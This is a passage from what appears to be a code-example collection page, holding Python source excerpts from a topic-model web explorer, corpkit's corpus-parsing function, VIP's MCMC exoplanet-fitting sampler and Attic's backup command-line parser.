                               'topics': dict([(str(t), p) for t, p in topics])})
                js.append(struct)

            return json.dumps(js)

        @self.route('/<k:int>/topics.json')
        @_set_acao_headers
        def topics(k):
            from topicexplorer.lib.color import rgb2hex

            response.content_type = 'application/json; charset=UTF8'
            response.set_header('Expires', _cache_date())
            response.set_header('Cache-Control', 'max-age=86400')
            

            # populate partial jsd values
            data = self.v[k].topic_jsds()

            js = {}
            for rank, topic_H in enumerate(data):
                topic, H = topic_H
                if math.isnan(H): 
                    H = 0.0
                js[str(topic)] = {
                    "H": float(H),
                    "color": rgb2hex(self.colors[k][topic])
                }

            # populate word values
            data = self.v[k].topics()

            wordmax = 10  # for alphabetic languages
            if kwargs.get('lang', None) == 'cn':
                wordmax = 25  # for ideographic languages

            for i, topic in enumerate(data):
                js[str(i)].update({'words': dict([(unicode(w), float(p))
                                                  for w, p in topic[:wordmax]])})

            return json.dumps(js)

        @self.route('/topics.json')
        @_set_acao_headers
        def word_topic_distance():
            import numpy as np
            response.content_type = 'application/json; charset=UTF8'

            # parse query
            try:
                if '|' in request.query.q:
                    query = request.query.q.lower().split('|')
                else:
                    query = request.query.q.lower().split(' ')
            except:
                raise Exception('Must specify a query')

            query = [word for word in query if word in self.c.words]

            # abort if there are no terms in the query
            if not query:
                response.status = 400  # Bad Request
                return "Search terms not in model"


            # calculate distances
            distances = dict()
            for k, viewer in self.v.iteritems():
                d = viewer.dist_word_top(query, show_topics=False)
                distances[k] = np.fromiter(
                    ((k, row['i'], row['value']) for row in d),
                    dtype=[('k', '<i8'), ('i', '<i8'), ('value', '<f8')])

            # merge and sort all topics across all models
            merged_similarity = np.hstack(distances.values())
            sorted_topics = merged_similarity[np.argsort(merged_similarity['value'])]

            # return data
            data = [{'k' : t['k'],
                     't' : t['i'],
                     'distance' : t['value'] } for t in sorted_topics]
            return json.dumps(data)


        @self.route('/topics')
        @_set_acao_headers
        def view_clusters():
            with open(resource_filename(__name__, '../www/master.mustache.html'),
                      encoding='utf-8') as tmpl_file:
                template = tmpl_file.read()

            tmpl_params = {'body' : _render_template('cluster.mustache.html'),
                           'topic_range': self.topic_range}
            return self.renderer.render(template, tmpl_params)


        @self.route('/docs.json')
        @_set_acao_headers
        def docs(docs=None, q=None):
            response.content_type = 'application/json; charset=UTF8'
            response.set_header('Expires', _cache_date())

            try:
                if request.query.q:
                    q = unquote(request.query.q)
            except:
                pass

            try:
                if request.query.id:
                    docs = [unquote(request.query.id)]
            except:
                pass

            try:
                response.set_header('Expires', 0)
                response.set_header('Pragma', 'no-cache')
                response.set_header('Cache-Control', 'no-cache, no-store, must-revalidate')
                if request.query.random:
                    docs = [random.choice(self.labels)]
            except:
                pass

            js = self.get_docs(docs, query=q)

            return json.dumps(js)

        @self.route('/icons.js')
        def icons():
            with open(resource_filename(__name__, '../www/icons.js')) as icons:
                text = '{0}\n var icons = {1};'\
                    .format(icons.read(), json.dumps(self.icons))
            return text

        def _render_template(page):
            response.set_header('Expires', _cache_date())

            with open(resource_filename(__name__, '../www/' + page),
                      encoding='utf-8') as tmpl_file:
                template = tmpl_file.read()

            tmpl_params = {'corpus_name': kwargs.get('corpus_name', ''),
                           'corpus_link': kwargs.get('corpus_link', ''),
                           'context_type': self.context_type,
                           'topic_range': self.topic_range,
                           'doc_title_format': kwargs.get('doc_title_format', '{0}'),
                           'doc_url_format': kwargs.get('doc_url_format', ''),
                           'home_link': kwargs.get('home_link', '/')}
            return self.renderer.render(template, tmpl_params)

        @self.route('/<k:int>/')
        def index(k):
            with open(resource_filename(__name__, '../www/master.mustache.html'),
                      encoding='utf-8') as tmpl_file:
                template = tmpl_file.read()

            tmpl_params = {'body' : _render_template('bars.mustache.html'),
                           'topic_range': self.topic_range}
            return self.renderer.render(template, tmpl_params)

        @self.route('/cluster.csv')
        @_set_acao_headers
        def cluster_csv(second=False):
            filename = kwargs.get('cluster_path')
            print "Retireving cluster.csv:", filename
            if not filename or not os.path.exists(filename):
                import topicexplorer.train
                filename = topicexplorer.train.cluster(10, self.config_file)
                kwargs['cluster_path'] = filename

            root, filename = os.path.split(filename)
            return static_file(filename, root=root)
        
        @self.route('/description.md')
        @_set_acao_headers
        def description():
            filename = kwargs.get('corpus_desc')
            if not filename:
                response.status = 404
                return "File not found"
            root, filename = os.path.split(filename)
            return static_file(filename, root=root)
        
        @self.route('/')
        @_set_acao_headers
        def cluster():
            with open(resource_filename(__name__, '../www/master.mustache.html'),
                      encoding='utf-8') as tmpl_file:
                template = tmpl_file.read()

            tmpl_params = {'body' : _render_template('splash.mustache.html'),
                           'topic_range': self.topic_range}
            return self.renderer.render(template, tmpl_params)

        @self.route('/<filename:path>')
        @_set_acao_headers
        def send_static(filename):
            return static_file(filename, root=resource_filename(__name__, '../www/'))

Example 136

Project: corpkit
Source File: make.py
View license
def make_corpus(unparsed_corpus_path,
                project_path=None,
                parse=True,
                tokenise=False,
                postag=False,
                lemmatise=False,
                corenlppath=False,
                nltk_data_path=False,
                operations=False,
                speaker_segmentation=False,
                root=False,
                multiprocess=False,
                split_texts=400,
                outname=False,
                metadata=False,
                restart=False,
                coref=True,
                lang='en',
                **kwargs):
    """
    Create a parsed version of unparsed_corpus using CoreNLP or NLTK's tokeniser
    :param unparsed_corpus_path: path to corpus containing text files, 
                                 or subdirs containing text files
    :type unparsed_corpus_path: str
    
    :param project_path: path to corpkit project
    :type project_path: str

    :param parse: Do parsing?
    :type parse: bool
    
    :param tokenise: Do tokenising?
    :type tokenise: bool
    
    :param corenlppath: folder containing corenlp jar files
    :type corenlppath: str
    
    :param nltk_data_path: path to tokeniser if tokenising
    :type nltk_data_path: str
    
    :param operations: which kinds of annotations to do
    :type operations: str
    
    :param speaker_segmentation: add speaker name to parser output if your corpus is script-like:
    :type speaker_segmentation: bool
    :returns: list of paths to created corpora
    """

    import sys
    import os
    from os.path import join, isfile, isdir, basename, splitext, exists
    import shutil
    import codecs
    from corpkit.build import folderise, can_folderise
    from corpkit.process import saferead, make_dotfile

    from corpkit.build import (get_corpus_filepaths, 
                               check_jdk, 
                               rename_all_files,
                               make_no_id_corpus, parse_corpus, move_parsed_files)
    from corpkit.constants import REPEAT_PARSE_ATTEMPTS

    if parse is True and tokenise is True:
        raise ValueError('Select either parse or tokenise, not both.')
    
    if project_path is None:
        project_path = os.getcwd()


    fileparse = isfile(unparsed_corpus_path)
    if fileparse:
        copier = shutil.copyfile
    else:
        copier = shutil.copytree

    # raise error if no tokeniser
    #if tokenise:
    #    if outname:
    #        newpath = os.path.join(os.path.dirname(unparsed_corpus_path), outname)
    #    else:
    #        newpath = unparsed_corpus_path + '-tokenised'
    #    if isdir(newpath):
    #        shutil.rmtree(newpath)
    #    import nltk
    #    if nltk_data_path:
    #        if nltk_data_path not in nltk.data.path:
    #            nltk.data.path.append(nltk_data_path)
    #    try:
    #        from nltk import word_tokenize as tokenise
    #    except:
    #        print('\nTokeniser not found. Pass in its path as keyword arg "nltk_data_path = <path>".\n')
    #        raise

    if sys.platform == "darwin":
        if not check_jdk():
            print("Get the latest Java from http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html")

    cop_head = kwargs.get('copula_head', True)
    note = kwargs.get('note', False)
    stdout = kwargs.get('stdout', False)

    # make absolute path to corpus
    unparsed_corpus_path = os.path.abspath(unparsed_corpus_path)

    # move it into project
    if fileparse:
        datapath = project_path
    else:
        datapath = join(project_path, 'data')
    
    if isdir(datapath):
        newp = join(datapath, basename(unparsed_corpus_path))
    else:
        os.makedirs(datapath)
        if fileparse:
            noext = splitext(unparsed_corpus_path)[0]
            newp = join(datapath, basename(noext))
        else:
            newp = join(datapath, basename(unparsed_corpus_path))

    if exists(newp):
        pass
    else:
        copier(unparsed_corpus_path, newp)
    
    unparsed_corpus_path = newp

    # ask to folderise?
    check_do_folderise = False
    do_folderise = kwargs.get('folderise', None)
    if can_folderise(unparsed_corpus_path):
        import __main__ as main
        if do_folderise is None and not hasattr(main, '__file__'):
            check_do_folderise = INPUTFUNC("Your corpus has multiple files, but no subcorpora. "\
                                 "Would you like each file to be treated as a subcorpus? (y/n) ")
            check_do_folderise = check_do_folderise.lower().startswith('y')
        if check_do_folderise or do_folderise:
            folderise(unparsed_corpus_path)
            
    # this is bad!
    if join('data', 'data') in unparsed_corpus_path:
        unparsed_corpus_path = unparsed_corpus_path.replace(join('data', 'data'), 'data')

    def chunks(l, n):
        for i in range(0, len(l), n):
            yield l[i:i+n]

    if parse or tokenise:
        
        # this loop shortens files containing more than 500 lines,
        # for corenlp memory's sake. maybe user needs a warning or
        # something in case s/he is doing coref?
        for rootx, dirs, fs in os.walk(unparsed_corpus_path):
            for f in fs:
                if f.startswith('.'):
                    continue
                fp = join(rootx, f)
                data, enc = saferead(fp)
                data = data.splitlines()
                if len(data) > split_texts:
                    chk = chunks(data, split_texts)
                    for index, c in enumerate(chk):
                        newname = fp.replace('.txt', '-%s.txt' % str(index + 1).zfill(3))
                        # does this work?
                        if PYTHON_VERSION == 2:
                            with codecs.open(newname, 'w', encoding=enc) as fo:
                                txt = '\n'.join(c) + '\n'
                                fo.write(txt.encode(enc))
                        else:
                            with open(newname, 'w', encoding=enc) as fo:
                                txt = '\n'.join(c) + '\n'
                                fo.write(txt)

                    os.remove(fp)
                else:
                    pass
                    #newname = fp.replace('.txt', '-000.txt')
                    #os.rename(fp, newname)

        if speaker_segmentation or metadata:
            if outname:
                newpath = os.path.join(os.path.dirname(unparsed_corpus_path), outname)
            else:
                newpath = unparsed_corpus_path + '-parsed'
            if restart:
                restart = newpath
            if isdir(newpath) and not root:
                import __main__ as main
                if not restart and not hasattr(main, '__file__'):
                    ans = INPUTFUNC('\n Path exists: %s. Do you want to overwrite? (y/n)\n' %newpath)
                    if ans.lower().strip()[0] == 'y':
                        shutil.rmtree(newpath)
                    else:
                        return
            elif isdir(newpath) and root:
                raise OSError('Path exists: %s' % newpath)
            if speaker_segmentation:
                print('Processing speaker IDs ...')
            make_no_id_corpus(unparsed_corpus_path,
                              unparsed_corpus_path + '-stripped',
                              metadata_mode=metadata,
                              speaker_segmentation=speaker_segmentation)
            to_parse = unparsed_corpus_path + '-stripped'
        else:
            to_parse = unparsed_corpus_path

        if not fileparse:
            print('Making list of files ... ')

        # now we enter a while loop while not all files are parsed
        #todo: these file lists are not necessary when not parsing

        while REPEAT_PARSE_ATTEMPTS:

            if not parse:
                break

            if not fileparse:
                pp = os.path.dirname(unparsed_corpus_path)
                # if restart mode, the filepaths won't include those already parsed...
                filelist, fs = get_corpus_filepaths(projpath=pp, 
                                                corpuspath=to_parse,
                                                restart=restart,
                                                out_ext=kwargs.get('output_format'))

            else:
                filelist = unparsed_corpus_path.replace('.txt', '-filelist.txt')
                with open(filelist, 'w') as fo:
                    fo.write(unparsed_corpus_path + '\n')

            # split up filelists
            if multiprocess is not False:

                if multiprocess is True:
                    import multiprocessing
                    multiprocess = multiprocessing.cpu_count()
                from joblib import Parallel, delayed
                # split old file into n parts
                data, enc = saferead(filelist)
                fs = [i for i in data.splitlines() if i]
                # if there's nothing here, we're done
                if not fs:
                    # double dutch
                    REPEAT_PARSE_ATTEMPTS = 0
                    break
                if len(fs) <= multiprocess:
                    multiprocess = len(fs)
                # make generator with list of lists
                divl = int(len(fs) / multiprocess)
                filelists = []
                if not divl:
                    filelists.append(filelist)
                else:
                    fgen = chunks(fs, divl)
                
                    # for each list, make new file
                    for index, flist in enumerate(fgen):
                        as_str = '\n'.join(flist) + '\n'
                        new_fpath = filelist.replace('.txt', '-%s.txt' % str(index).zfill(4))
                        filelists.append(new_fpath)
                        with codecs.open(new_fpath, 'w', encoding='utf-8') as fo:
                            fo.write(as_str.encode('utf-8'))
                    try:
                        os.remove(filelist)
                    except:
                        pass

                ds = []
                for listpath in filelists:
                    d = {'proj_path': project_path, 
                         'corpuspath': to_parse,
                         'filelist': listpath,
                         'corenlppath': corenlppath,
                         'nltk_data_path': nltk_data_path,
                         'operations': operations,
                         'copula_head': cop_head,
                         'multiprocessing': True,
                         'root': root,
                         'note': note,
                         'stdout': stdout,
                         'outname': outname,
                         'coref': coref,
                         'output_format': kwargs.get('output_format', 'xml')
                        }
                    ds.append(d)

                res = Parallel(n_jobs=multiprocess)(delayed(parse_corpus)(**x) for x in ds)
                if len(res) > 0:
                    newparsed = res[0]
                else:
                    return
                if all(r is False for r in res):
                    return

                for i in filelists:
                    try:
                        os.remove(i)
                    except:
                        pass

            else:
                newparsed = parse_corpus(proj_path=project_path, 
                                         corpuspath=to_parse,
                                         filelist=filelist,
                                         corenlppath=corenlppath,
                                         nltk_data_path=nltk_data_path,
                                         operations=operations,
                                         copula_head=cop_head,
                                         root=root,
                                         note=note,
                                         stdout=stdout,
                                         fileparse=fileparse,
                                         outname=outname,
                                         output_format=kwargs.get('output_format', 'conll'))

            if not restart:
                REPEAT_PARSE_ATTEMPTS = 0
            else:
                REPEAT_PARSE_ATTEMPTS -= 1
                print('Repeating parsing due to missing files. '\
                      '%d iterations remaining.' % REPEAT_PARSE_ATTEMPTS)

        if parse and not newparsed:
            return 
        if parse and all(not x for x in newparsed):
            return

        if parse and fileparse:
            # cleanup mistakes :)
            if isfile(splitext(unparsed_corpus_path)[0]):
                os.remove(splitext(unparsed_corpus_path)[0])
            if isfile(unparsed_corpus_path.replace('.txt', '-filelist.txt')):
                os.remove(unparsed_corpus_path.replace('.txt', '-filelist.txt'))
            return unparsed_corpus_path + '.conll'

        if parse:
            move_parsed_files(project_path, to_parse, newparsed,
                          ext=kwargs.get('output_format', 'conll'), restart=restart)

            from corpkit.conll import convert_json_to_conll
            coref = False
            if operations is False:
                coref = True
            elif 'coref' in operations or 'dcoref' in operations:
               coref = True

            convert_json_to_conll(newparsed, speaker_segmentation=speaker_segmentation,
                                  coref=coref, metadata=metadata)

        try:
            os.remove(filelist)
        except:
            pass

    if not parse and tokenise:
        #todo: outname
        newparsed = to_parse.replace('-stripped', '-tokenised')
        from corpkit.tokenise import plaintext_to_conll
        newparsed = plaintext_to_conll(to_parse,
                                    postag=postag,
                                    lemmatise=lemmatise,
                                    lang=lang,
                                    metadata=metadata,
                                    nltk_data_path=nltk_data_path,
                                    speaker_segmentation=speaker_segmentation,
                                    outpath=newparsed)

        if outname:
            if not os.path.isdir(outname):
                outname = os.path.join('data', os.path.basename(outdir))
            import shutil
            shutil.copytree(newparsed, outname)
            newparsed = outname
        if newparsed is False:
            return
        else:
            make_dotfile(newparsed)
            return newparsed

    rename_all_files(newparsed)

    print('Done!\n')
    make_dotfile(newparsed)
    return newparsed

Example 137

Project: VIP
Source File: mcmc_sampling.py
View license
def mcmc_negfc_sampling(cubes, angs, psfn, ncomp, plsc, initial_state,
                        fwhm=4, annulus_width=3, aperture_radius=4, cube_ref=None, 
                        svd_mode='lapack', scaling='temp-mean', fmerit='sum',
                        collapse='median', nwalkers=1000, bounds=None, a=2.0,
                        burnin=0.3, rhat_threshold=1.01, rhat_count_threshold=1,
                        niteration_min=0, niteration_limit=1e02, 
                        niteration_supp=0, check_maxgap=1e04, nproc=1, 
                        output_file=None, display=False, verbose=True, save=False):
    """ Runs an affine invariant mcmc sampling algorithm in order to determine
    the position and the flux of the planet using the 'Negative Fake Companion'
    technique. The result of this procedure is a chain with the samples from the
    posterior distributions of each of the 3 parameters.
    
    This technique can be summarized as follows:
    
    1)  We inject a negative fake companion (one candidate) at a given 
        position and characterized by a given flux, both close to the expected 
        values.
    2)  We run PCA on an full annulus which pass through the initial guess, 
        regardless of the position of the candidate.
    3)  We extract the intensity values of all the pixels contained in a 
        circular aperture centered on the initial guess.
    4)  We calculate the function of merit. The associated chi^2 is given by
        chi^2 = sum(|I_j|) where j \in {1,...,N} with N the total number of 
        pixels contained in the circular aperture.        
    The steps 1) to 4) are looped. At each iteration, the candidate model 
    parameters are defined by the emcee Affine Invariant algorithm. 
    
    Parameters
    ----------  
    cubes: str or numpy.array
        The relative path to the cube of fits images OR the cube itself.
    angs: str or numpy.array
        The relative path to the parallactic angle fits image or the angs itself.
    psfn: str or numpy.array
        The relative path to the instrumental PSF fits image or the PSF itself.
        The PSF must be centered and the flux in a 1*FWHM aperture must equal 1.
    ncomp: int
        The number of principal components.        
    plsc: float
        The platescale, in arcsec per pixel.  
    annulus_width: float, optional
        The width in pixel of the annulus on which the PCA is performed.
    aperture_radius: float, optional
        The radius of the circular aperture.        
    nwalkers: int optional
        The number of Goodman & Weare 'walkers'.
    initial_state: numpy.array
        The first guess for the position and flux of the planet, respectively.
        Each walker will start in a small ball around this preferred position.
    cube_ref : array_like, 3d, optional
        Reference library cube. For Reference Star Differential Imaging.
    svd_mode : {'lapack', 'randsvd', 'eigen', 'arpack'}, str optional
        Switch for different ways of computing the SVD and selected PCs.
        'randsvd' is not recommended for the negative fake companion technique.
    scaling : {'temp-mean', 'temp-standard'} or None, optional
        With None, no scaling is performed on the input data before SVD. With 
        "temp-mean" then temporal px-wise mean subtraction is done and with 
        "temp-standard" temporal mean centering plus scaling to unit variance 
        is done. 
    fmerit : {'sum', 'stddev'}, string optional
        Chooses the figure of merit to be used. stddev works better for close in
        companions sitting on top of speckle noise.
    collapse : {'median', 'mean', 'sum', 'trimmean', None}, str or None, optional
        Sets the way of collapsing the frames for producing a final image. If
        None then the cube of residuals is used when measuring the function of
        merit (instead of a single final frame).
    bounds: numpy.array or list, default=None, optional
        The prior knowledge on the model parameters. If None, large bounds will 
        be automatically estimated from the initial state.
    a: float, default=2.0
        The proposal scale parameter. See notes.
    burnin: float, default=0.3
        The fraction of a walker which is discarded.
    rhat_threshold: float, default=0.01
        The Gelman-Rubin threshold used for the test for nonconvergence.   
    rhat_count_threshold: int, optional
        The Gelman-Rubin test must be satisfied 'rhat_count_threshold' times in
        a row before claiming that the chain has converged.        
    niteration_min: int, optional
        Steps per walker lower bound. The simulation will run at least this
        number of steps per walker.
    niteration_limit: int, optional
        Steps per walker upper bound. If the simulation runs up to 
        'niteration_limit' steps without having reached the convergence 
        criterion, the run is stopped.
    niteration_supp: int, optional
        Number of iterations to run after having "reached the convergence".     
    check_maxgap: int, optional
        Maximum number of steps per walker between two Gelman-Rubin test.
    nproc: int, optional
        The number of processes to use for parallelization. 
    output_file: str
        The name of the ouput file which contains the MCMC results 
        (if save is True).
    display: boolean
        If True, the walk plot is displayed at each evaluation of the Gelman-
        Rubin test.
    verbose: boolean
        Display informations in the shell.
    save: boolean
        If True, the MCMC results are pickled.
                    
    Returns
    -------
    out : numpy.array
        The MCMC chain.         
        
    Notes
    -----
    The parameter 'a' must be > 1. For more theoretical information concerning
    this parameter, see Goodman & Weare, 2010, Comm. App. Math. Comp. Sci., 
    5, 65, Eq. [9] p70.
    
    The parameter 'rhat_threshold' can be a numpy.array with individual 
    threshold value for each model parameter.
    """ 
    if verbose:
        start_time = timeInit()
        print "        MCMC sampler for the NEGFC technique       "
        print sep

    # If required, one create the output folder.    
    if save:    
        if not os.path.exists('results'):
            os.makedirs('results')
        
        if output_file is None:
            datetime_today = datetime.datetime.today()
            output_file = str(datetime_today.year)+str(datetime_today.month)+\
                          str(datetime_today.day)+'_'+str(datetime_today.hour)+\
                          str(datetime_today.minute)+str(datetime_today.second)            
        
        if not os.path.exists('results/'+output_file):
            os.makedirs('results/'+output_file)

            
    # #########################################################################
    # If required, one opens the source files
    # #########################################################################
    if isinstance(cubes,str) and isinstance(angs,str):
        if angs is None:
            cubes, angs = open_adicube(cubes, verbose=False)
        else:
            cubes = open_fits(cubes)
            angs = open_fits(angs, verbose=False)    
        
        if isinstance(psfn,str):
            psfn = open_fits(psfn)
        
        if verbose:
            print 'The data has been loaded. Let''s continue !'
    
    # #########################################################################
    # Initialization of the variables
    # #########################################################################    
    dim = 3 # There are 3 model parameters, resp. the radial and angular 
            # position of the planet and its flux.
    
    itermin = niteration_min
    limit = niteration_limit    
    supp = niteration_supp
    maxgap = check_maxgap
    initial_state = np.array(initial_state)
    
    if itermin > limit:
        itermin = 0
        print("'niteration_min' must be < 'niteration_limit'.")
        
    fraction = 0.3
    geom = 0
    lastcheck = 0
    konvergence = np.inf
    rhat_count = 0
        
    chain = np.empty([nwalkers,1,dim])
    isamples = np.empty(0)
    pos = initial_state + np.random.normal(0,1e-01,(nwalkers,3))
    nIterations = limit + supp
    rhat = np.zeros(dim)  
    stop = np.inf
    

    if bounds is None:
        bounds = [(initial_state[0]-annulus_width/2.,initial_state[0]+annulus_width/2.), #radius
                  (initial_state[1]-10,initial_state[1]+10), #angle
                  (0,2*initial_state[2])] #flux
    
    sampler = emcee.EnsembleSampler(nwalkers,dim,lnprob,a,
                                    args =([bounds, cubes, angs, plsc, psfn,
                                            fwhm, annulus_width, ncomp,
                                            aperture_radius, initial_state,
                                            cube_ref, svd_mode, scaling, fmerit,
                                            collapse]),
                                    threads=nproc)
    
    duration_start = datetime.datetime.now()
    start = datetime.datetime.now()

    # #########################################################################
    # Affine Invariant MCMC run
    # ######################################################################### 
    if verbose:
        print ''
        print 'Start of the MCMC run ...'
        print 'Step  |  Duration/step (sec)  |  Remaining Estimated Time (sec)'
                             
    for k, res in enumerate(sampler.sample(pos,iterations=nIterations,
                                           storechain=True)):
        elapsed = (datetime.datetime.now()-start).total_seconds()
        if verbose:
            if k == 0:
                q = 0.5
            else:
                q = 1
            print '{}\t\t{:.5f}\t\t\t{:.5f}'.format(k,elapsed*q,elapsed*(limit-k-1)*q)
            
        start = datetime.datetime.now()

        # ---------------------------------------------------------------------        
        # Store the state manually in order to handle with dynamical sized chain.
        # ---------------------------------------------------------------------    
        ## Check if the size of the chain is long enough.
        s = chain.shape[1]
        if k+1 > s: #if not, one doubles the chain length
            empty = np.zeros([nwalkers,2*s,dim])
            chain = np.concatenate((chain,empty),axis=1)
        ## Store the state of the chain
        chain[:,k] = res[0]
        
        
        # ---------------------------------------------------------------------
        # If k meets the criterion, one tests the non-convergence.
        # ---------------------------------------------------------------------              
        criterion = np.amin([ceil(itermin*(1+fraction)**geom),\
                            lastcheck+floor(maxgap)])
   
        if k == criterion:
            if verbose:
                print ''
                print '   Gelman-Rubin statistic test in progress ...' 
            
            geom += 1
            lastcheck = k
            if display:
                showWalk(chain)
                
            if save:
                import pickle                                    
                
                with open('results/'+output_file+'/'+output_file+'_temp_k{}'.format(k),'wb') as fileSave:
                    myPickler = pickle.Pickler(fileSave)
                    myPickler.dump({'chain':sampler.chain, 
                                    'lnprob':sampler.lnprobability, 
                                    'AR':sampler.acceptance_fraction})
                
            ## We only test the rhat if we have reached the minimum number of steps.
            if (k+1) >= itermin and konvergence == np.inf:
                threshold0 = int(floor(burnin*k))
                threshold1 = int(floor((1-burnin)*k*0.25))

                # We calculate the rhat for each model parameter.
                for j in range(dim):
                    part1 = chain[:,threshold0:threshold0+threshold1,j].reshape((-1))
                    part2 = chain[:,threshold0+3*threshold1:threshold0+4*threshold1,j].reshape((-1))
                    series = np.vstack((part1,part2))
                    rhat[j] = gelman_rubin(series)   
                if verbose:    
                    print '   r_hat = {}'.format(rhat)
                    print '   r_hat <= threshold = {}'.format(rhat <= rhat_threshold)
                    print ''
                # We test the rhat.
                if (rhat <= rhat_threshold).all(): #and rhat_count < rhat_count_threshold: 
                    rhat_count += 1
                    if rhat_count < rhat_count_threshold:
                        print("Gelman-Rubin test OK {}/{}".format(rhat_count,rhat_count_threshold))
                    elif rhat_count >= rhat_count_threshold:
                        print '... ==> convergence reached'
                        konvergence = k
                        stop = konvergence + supp                       
                #elif (rhat <= rhat_threshold).all() and rhat_count >= rhat_count_threshold:
                #    print '... ==> convergence reached'
                #    konvergence = k
                #    stop = konvergence + supp
                else:
                    rhat_count = 0

        if (k+1) >= stop: #Then we have reached the maximum number of steps for our Markov chain.
            print 'We break the loop because we have reached convergence'
            break
      
    if k == nIterations-1:
        print("We have reached the limit number of steps without having converged")
            
    # #########################################################################
    # Construction of the independent samples
    # ######################################################################### 
            
    temp = np.where(chain[0,:,0] == 0.0)[0]
    if len(temp) != 0:
        idxzero = temp[0]
    else:
        idxzero = chain.shape[1]
    
    idx = np.amin([np.floor(2e05/nwalkers),np.floor(0.1*idxzero)])
    if idx == 0:
        isamples = chain[:,0:idxzero,:] 
    else:
        isamples = chain[:,idxzero-idx:idxzero,:]

    if save:
        import pickle
        
        frame = inspect.currentframe()
        args, _, _, values = inspect.getargvalues(frame)
        input_parameters = {j : values[j] for j in args[1:]}        
        
        output = {'isamples':isamples,
                  'chain': chain_zero_truncated(chain),
                  'input_parameters': input_parameters,
                  'AR': sampler.acceptance_fraction,
                  'lnprobability': sampler.lnprobability}
                  
        with open('results/'+output_file+'/MCMC_results','wb') as fileSave:
            myPickler = pickle.Pickler(fileSave)
            myPickler.dump(output)
        
        print ''        
        print("The file MCMC_results has been stored in the folder {}".format('results/'+output_file+'/'))

    if verbose:
        timing(start_time)
                                    
    return chain_zero_truncated(chain)    

Example 138

Project: attic
Source File: archiver.py
View license
    def run(self, args=None):
        check_extension_modules()
        keys_dir = get_keys_dir()
        if not os.path.exists(keys_dir):
            os.makedirs(keys_dir)
            os.chmod(keys_dir, stat.S_IRWXU)
        cache_dir = get_cache_dir()
        if not os.path.exists(cache_dir):
            os.makedirs(cache_dir)
            os.chmod(cache_dir, stat.S_IRWXU)
            with open(os.path.join(cache_dir, 'CACHEDIR.TAG'), 'w') as fd:
                fd.write(textwrap.dedent("""
                    Signature: 8a477f597d28d172789f06886806bc55
                    # This file is a cache directory tag created by Attic.
                    # For information about cache directory tags, see:
                    #       http://www.brynosaurus.com/cachedir/
                    """).lstrip())
        common_parser = argparse.ArgumentParser(add_help=False)
        common_parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
                            default=False,
                            help='verbose output')

        # We can't use argparse for "serve" since we don't want it to show up in "Available commands"
        if args:
            args = self.preprocess_args(args)

        parser = argparse.ArgumentParser(description='Attic %s - Deduplicated Backups' % __version__)
        subparsers = parser.add_subparsers(title='Available commands')

        subparser = subparsers.add_parser('serve', parents=[common_parser],
                                          description=self.do_serve.__doc__)
        subparser.set_defaults(func=self.do_serve)
        subparser.add_argument('--restrict-to-path', dest='restrict_to_paths', action='append',
                               metavar='PATH', help='restrict repository access to PATH')
        init_epilog = textwrap.dedent("""
        This command initializes an empty repository. A repository is a filesystem
        directory containing the deduplicated data from zero or more archives.
        Encryption can be enabled at repository init time.
        """)
        subparser = subparsers.add_parser('init', parents=[common_parser],
                                          description=self.do_init.__doc__, epilog=init_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_init)
        subparser.add_argument('repository', metavar='REPOSITORY',
                               type=location_validator(archive=False),
                               help='repository to create')
        subparser.add_argument('-e', '--encryption', dest='encryption',
                               choices=('none', 'passphrase', 'keyfile'), default='none',
                               help='select encryption method')

        check_epilog = textwrap.dedent("""
        The check command verifies the consistency of a repository and the corresponding
        archives. The underlying repository data files are first checked to detect bit rot
        and other types of damage. After that the consistency and correctness of the archive
        metadata is verified.

        The archive metadata checks can be time consuming and requires access to the key
        file and/or passphrase if encryption is enabled. These checks can be skipped using
        the --repository-only option.
        """)
        subparser = subparsers.add_parser('check', parents=[common_parser],
                                          description=self.do_check.__doc__,
                                          epilog=check_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_check)
        subparser.add_argument('repository', metavar='REPOSITORY',
                               type=location_validator(archive=False),
                               help='repository to check consistency of')
        subparser.add_argument('--repository-only', dest='repo_only', action='store_true',
                               default=False,
                               help='only perform repository checks')
        subparser.add_argument('--archives-only', dest='archives_only', action='store_true',
                               default=False,
                               help='only perform archives checks')
        subparser.add_argument('--repair', dest='repair', action='store_true',
                               default=False,
                               help='attempt to repair any inconsistencies found')

        change_passphrase_epilog = textwrap.dedent("""
        The key files used for repository encryption are optionally passphrase
        protected. This command can be used to change this passphrase.
        """)
        subparser = subparsers.add_parser('change-passphrase', parents=[common_parser],
                                          description=self.do_change_passphrase.__doc__,
                                          epilog=change_passphrase_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_change_passphrase)
        subparser.add_argument('repository', metavar='REPOSITORY',
                               type=location_validator(archive=False))

        create_epilog = textwrap.dedent("""
        This command creates a backup archive containing all files found while recursively
        traversing all paths specified. The archive will consume almost no disk space for
        files or parts of files that have already been stored in other archives.

        See "attic help patterns" for more help on exclude patterns.
        """)

        subparser = subparsers.add_parser('create', parents=[common_parser],
                                          description=self.do_create.__doc__,
                                          epilog=create_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_create)
        subparser.add_argument('-s', '--stats', dest='stats',
                               action='store_true', default=False,
                               help='print statistics for the created archive')
        subparser.add_argument('-e', '--exclude', dest='excludes',
                               type=ExcludePattern, action='append',
                               metavar="PATTERN", help='exclude paths matching PATTERN')
        subparser.add_argument('--exclude-from', dest='exclude_files',
                               type=argparse.FileType('r'), action='append',
                               metavar='EXCLUDEFILE', help='read exclude patterns from EXCLUDEFILE, one per line')
        subparser.add_argument('--exclude-caches', dest='exclude_caches',
                               action='store_true', default=False,
                               help='exclude directories that contain a CACHEDIR.TAG file (http://www.brynosaurus.com/cachedir/spec.html)')
        subparser.add_argument('-c', '--checkpoint-interval', dest='checkpoint_interval',
                               type=int, default=300, metavar='SECONDS',
                               help='write checkpoint every SECONDS seconds (Default: 300)')
        subparser.add_argument('--do-not-cross-mountpoints', dest='dontcross',
                               action='store_true', default=False,
                               help='do not cross mount points')
        subparser.add_argument('--numeric-owner', dest='numeric_owner',
                               action='store_true', default=False,
                               help='only store numeric user and group identifiers')
        subparser.add_argument('archive', metavar='ARCHIVE',
                               type=location_validator(archive=True),
                               help='archive to create')
        subparser.add_argument('paths', metavar='PATH', nargs='+', type=str,
